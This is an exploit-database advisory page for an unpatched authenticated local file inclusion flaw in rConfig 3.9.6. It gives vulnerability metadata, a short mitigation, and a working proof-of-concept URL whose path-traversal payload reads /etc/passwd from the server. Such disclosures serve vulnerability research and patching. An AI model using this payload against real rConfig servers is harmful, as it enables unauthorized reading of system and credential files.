header-logo
Suggest Exploit
vendor:
rConfig
by:
5a65726f
7.5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: rConfig
Affected Version From: rConfig v3.9.6
Affected Version To: rConfig v3.9.6
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: centOS 7
2021

rConfig 3.9.6 – ‘path’ Local File Inclusion (Authenticated)

rConfig, the open source network device configuration management tool, is vulnerable to local file inclusion in /lib/ajaxHandlers/ajaxGetFileByPath.php with parameter path. ajaxGetFileByPath.php allows authenticated users to download any file on the server. The following steps can be carried out in duplicating this vulnerability: Login the rConfig application with your credentials and enter the following link to your browser: http(s)://<SERVER>/lib/ajaxHandlers/ajaxGetFileByPath.php?path=../../../../../../etc/passwd

Mitigation:

Restrict access to the vulnerable file, and ensure that the application is running with the least privileges necessary.
Source

Exploit-DB raw data:

# Exploit Title: rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated)
# Date: 2021-03-12
# Exploit Author: 5a65726f
# Vendor Homepage: https://www.rconfig.com
# Software Link: https://www.rconfig.com/downloads/rconfig-3.9.6.zip
# Version: rConfig v3.9.6
# Install scripts  :
# https://www.rconfig.com/downloads/scripts/install_rConfig.sh
# https://www.rconfig.com/downloads/scripts/centos7_install.sh
# https://www.rconfig.com/downloads/scripts/centos6_install.sh
# Tested on: centOS 7
# Notes : If you want to reproduce in your lab environment follow those links :
# http://help.rconfig.com/gettingstarted/installation
# then
# http://help.rconfig.com/gettingstarted/postinstall

# Description:
rConfig, the open source network device configuration management tool, is vulnerable to local file inclusion in /lib/ajaxHandlers/ajaxGetFileByPath.php with parameter path.  ajaxGetFileByPath.php allows authenticated users to download any file on the server.

The following steps can be carried out in duplicating this vulnerability.

- Login the rConfig application with your credentials.
- Enter the following link to your browser: 
http(s)://<SERVER>/lib/ajaxHandlers/ajaxGetFileByPath.php?path=../../../../../../etc/passwd

Navigation

Suggest Exploit

Services By CQR